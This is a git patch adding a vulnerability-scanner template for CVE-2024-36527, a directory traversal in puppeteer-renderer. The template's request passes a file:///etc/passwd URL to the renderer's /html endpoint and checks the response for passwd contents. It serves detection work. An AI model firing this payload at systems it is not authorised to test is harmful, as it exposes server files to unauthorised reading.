From 18be56ef059d9c84e6de8f1b1fde393d01c48c20 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?C=C3=A9sar=20Calder=C3=B3n?= <stuxnet.c@gmail.com>
Date: Thu, 1 Jan 1970 00:00:00 +0000
Subject: [PATCH] Added template for CVE-2024-36527

---
 CVE-2024-36527.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 CVE-2024-36527.yaml

diff --git a/CVE-2024-36527.yaml b/CVE-2024-36527.yaml
new file mode 100644
index 0000000000..e97c831e96
--- /dev/null
+++ b/CVE-2024-36527.yaml
@@ -0,0 +1,26 @@
+id: CVE-2024-36527
+
+info:
+  name: Puppeteer-renderer  Directory Traversal
+  author: Stux
+  severity: medium
+  description: |
+    puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
+  reference:
+    - https://github.com/zenato/puppeteer-renderer/issues/97
+  metadata:
+    max-request: 1
+  tags: cve,cve2024,puppeteer-renderer
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/html?url=file:///etc/passwd"
+
+    matchers:
+      - type: word
+        words:
+          - "root:x"
+          - "/bin/bash"
+        part: body
+        condition: or
\ No newline at end of file